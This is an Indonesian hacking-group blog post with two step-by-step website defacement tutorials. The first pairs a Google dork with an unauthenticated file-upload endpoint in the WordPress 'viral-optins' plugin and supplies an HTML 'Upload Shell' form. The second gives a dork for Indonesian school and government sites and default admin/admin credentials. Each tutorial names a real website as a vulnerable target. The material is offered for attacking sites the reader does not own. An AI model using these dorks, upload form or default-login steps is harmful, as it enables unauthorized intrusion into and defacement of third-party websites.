Selasa, 05 April 2016

Tutorial Deface Dengan Metode Viral_Optins v2


   

     Hallo!!!!!!! , Berjumpa Lagi Sama Mr.3RR0R  :v

Gmana Kabarnya.? , Pasti Lagi Online , Sambil Duduk :D

Klau Gitu Saya Lagi Berbagi "Tutorial Deface Dengan Viral_Optins v2"

Langsung Aja Ke Tempat Pembelajaran

- Dork : "inurl:/wp-content/plugins/viral-optins/" ( tanpa tanda " )

Exploit : http://target/wp-content/plugins/viral-optins/api/uploader/file-uploader.php


CSRF : 



<font color="red">
<h1 align="center">Upload Shell</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST" action="target" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">


</form></body>

      Langsung Aja Pergi Ke Google.com , Terus Gunakan Dorknya 

terus Cari Target , Klau dapat masukin Exploit Yang Ada Diatas.

Kalau Vuln Nanti Tuh Tidak Ada tulisan (Blank) .

Upload Deh file yg Berextensi .jpg .png .txt dll (html atau php nggak bisa :v)

Akses file : http://target/wp-content/uploads/(tahun)/(bulan)/file


Vuln Target :"http://ailisgarcia.com/wp-content/plugins/viral-optins/api/uploader/file-
uploader.php"


Exploit Author : Mr.3RR0R (PhantomGhost)


My Facebook : https://www.facebook.com/marselERROR

Forum : phantom-ghost.org

Fanspage : https://www.facebook.com/PG.phtml/

Tutorial Deface Dengan Default User Admin



       Halluuu . Sekarang Saya Akan Membahas "Tutorial Deface Dengan Default User Admin"

Ini Teknik Yang Sering Saya Gunakan Dan Teknik Ini Sangat Mudah Dipelajari.

Kalau Begitu Langsung Aja Ke Tempat Pembelajaran :D

Alat Yang Digunakan :D :

- Laptop/PC/Hp

- KeyBoard

- Kalau Bisa Sih Secangkir Kopi :D

Bahan Yang Digunakan : 

- Dork : "inurl:/html/index.php?berita site:sch.id" bisa jg go.id , ac.id , co.id atau id

- Path admin : www.site.com/admin/index.php

         
       Kalau Alat Dan Bahannya Sudah Lengkap Langsung aja

Cari Targetnya , contoh : www.site.com/html/index.php?id=berita

Ubah Tuh Menjadi www.site.com/admin/ 

klau udah , Nanti Ke Redict Ke Halaman Adminnya Kok  :D

Setelah Itu Masukin User Name Dan Passwordnya , user dan passwordnya : "admin"

Kalau Webnya Vuln Nanti Ke Redict Sendiri Kok Ke Halaman Adminnya

Kyak Gini "www.site.com/admin/admin.php"

Kalau Udah Gitu Terserah Kalian Mau Apain Tuh Website


Vuln Target :  http://www.palatahzan.org/admin/


terima kasih :D , salah dan kurangnya mohon di maafkan :D


Thanks To : 4prili666h05T - VANKAS7IC - JackWho - Mr.Aljabar - Mr.3RR0R - gekikara404 - Mr.DeFroz - KidSZonk - Harith101

Fanspage : https://ww.facebook.com/PG.phtml

Facebook Saya : https://www.facebook.com/marselERROR